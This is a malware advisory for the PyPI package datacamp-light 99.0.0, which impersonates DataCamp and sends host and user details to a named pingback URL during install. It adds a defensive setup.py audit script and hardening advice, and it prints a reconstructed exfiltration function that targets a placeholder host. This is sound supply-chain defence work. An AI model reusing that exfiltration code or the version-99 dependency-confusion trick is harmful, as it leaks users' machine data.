datacamp-light @99.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-5868
Ecosystem
pypi
Summary
datacamp-light 99.0.0 impersonates DataCamp's internal package: the metadata sets name='datacamp-light', author='DataCamp' and url='https://github.com/datacamp/datacamp-light', and the anomalous version 99.0.0 is the canonical dependency-confusion bait shape, chosen so that a resolver consulting both a private index and PyPI prefers this public release over the real internal one. setup.py defines an exfiltrate() function and calls it unconditionally at module level, so it runs whenever setup.py is executed, as it is during pip install. The function collects the hostname, current working directory, platform, Python version and the USER/USERNAME environment variables, JSON-encodes them, and POSTs them via urllib.request.urlopen to https://z39gspa3.pingback.sh/c. Any installer whose resolver picks up this public artifact therefore leaks host and user identifiers to the pingback domain. Although the package self-labels as a 'PoC', the published artifact actively phones home from every machine that installs it.
Source: amazon-inspector (234a0d37873455b7db32068745d93ed29aafa596877b39949280b4ec0621ad6b)
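The pattern described in the summary (a module-level call in setup.py that gathers host and user identifiers and POSTs them over HTTP, shipped under an inflated version so the public release outranks the internal one) can be caught before install with a static pass over the sdist. The following is an added example written for this report; it is not code from the package, from osv.dev or from Amazon Inspector. SAMPLE_SETUP_PY is constructed to mirror the reported behaviour and uses a placeholder URL (example.invalid) rather than the reported beacon; the module and environment-variable lists are the author's own choices, not a published rule set.

```python
"""Static pre-install audit of an sdist's setup.py (Python 3.9+).

Added example for this report, not code from the package, from OSV or from
Amazon Inspector. It looks for the pattern the summary describes: network
imports, reads of identity-bearing environment variables, a hard-coded URL,
and a module-level call that runs on `pip install`. SAMPLE_SETUP_PY below is
constructed to mirror that pattern; its URL is a placeholder, not the
reported domain.
"""
from __future__ import annotations

import ast
from dataclasses import dataclass

# Assumed lists for illustration; tune them to your own allow/deny policy.
NETWORK_MODULES = {"urllib", "urllib3", "requests", "socket", "http", "ftplib", "smtplib"}
IDENTITY_ENV = {"USER", "USERNAME", "LOGNAME", "HOME", "HOSTNAME", "COMPUTERNAME"}


@dataclass(frozen=True)
class Finding:
    kind: str
    detail: str
    line: int


def _dotted(node):
    """Render Name/Attribute chains as 'os.environ.get'; None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def audit_setup_py(source: str) -> list[Finding]:
    tree = ast.parse(source)
    out = []
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            # A build script has no reason to import a socket or an HTTP client.
            mods = [a.name for a in node.names] if isinstance(node, ast.Import) else [node.module or ""]
            for m in mods:
                if m.split(".")[0] in NETWORK_MODULES:
                    out.append(Finding("network-import", m, node.lineno))
        elif isinstance(node, ast.Call) and _dotted(node.func) in ("os.environ.get", "os.getenv"):
            key = node.args[0] if node.args else None
            if isinstance(key, ast.Constant) and key.value in IDENTITY_ENV:
                out.append(Finding("identity-env", key.value, node.lineno))
        elif isinstance(node, ast.Subscript) and _dotted(node.value) == "os.environ":
            if isinstance(node.slice, ast.Constant) and node.slice.value in IDENTITY_ENV:
                out.append(Finding("identity-env", node.slice.value, node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and node.value.startswith(("http://", "https://")):
            out.append(Finding("url-literal", node.value, node.lineno))
    # Anything called at module scope executes during `pip install`; only setup() belongs there.
    for stmt in tree.body:
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            name = _dotted(stmt.value.func)
            if name not in ("setup", "setuptools.setup"):
                out.append(Finding("top-level-call", name or "<dynamic>", stmt.lineno))
    return out


def should_block(findings: list[Finding]) -> bool:
    """Block when install-time code also has a way to reach the network."""
    kinds = {f.kind for f in findings}
    return "top-level-call" in kinds and bool(kinds & {"network-import", "url-literal"})


def public_outranks_internal(public: str, internal: str) -> bool:
    """pip keeps the highest version seen across indexes, so any public release
    numbered above the internal one wins resolution; 99.0.0 is chosen to outrank everything."""
    parse = lambda v: tuple(int(p) for p in v.split("."))
    return parse(public) > parse(internal)


# Constructed sample modelled on the reported setup.py; not the real file.
SAMPLE_SETUP_PY = """\
import json
import os
import platform
import socket
import sys
import urllib.request
from setuptools import setup


def exfiltrate():
    data = {
        "hostname": socket.gethostname(),
        "cwd": os.getcwd(),
        "platform": platform.platform(),
        "python": sys.version,
        "user": os.environ.get("USER") or os.environ.get("USERNAME"),
    }
    req = urllib.request.Request(
        "https://example.invalid/c",  # constructed placeholder, not the reported beacon
        data=json.dumps(data).encode(),
        headers={"Content-Type": "application/json"},
    )
    urllib.request.urlopen(req, timeout=5)


exfiltrate()  # unconditional, so it fires during pip install

setup(name="datacamp-light", version="99.0.0", author="DataCamp")
"""

if __name__ == "__main__":
    for f in audit_setup_py(SAMPLE_SETUP_PY):
        print(f"{f.kind:15} line {f.line:3}  {f.detail}")
    print("block:", should_block(audit_setup_py(SAMPLE_SETUP_PY)))
    print("99.0.0 outranks internal 1.12.3:", public_outranks_internal("99.0.0", "1.12.3"))
```

Run this against the setup.py from `pip download --no-deps --no-binary :all: <pkg>==<ver>` before anything executes it. The AST pass is a triage signal, not a verdict: code that unpacks itself from a base64 blob and exec()s it will evade it, which is why the resolver-side fix matters more. Point pip at the private index only (`--index-url`, never `--extra-index-url` alongside PyPI), register or reserve internal names publicly, and pin with hashes so a higher-numbered public release cannot be selected at all.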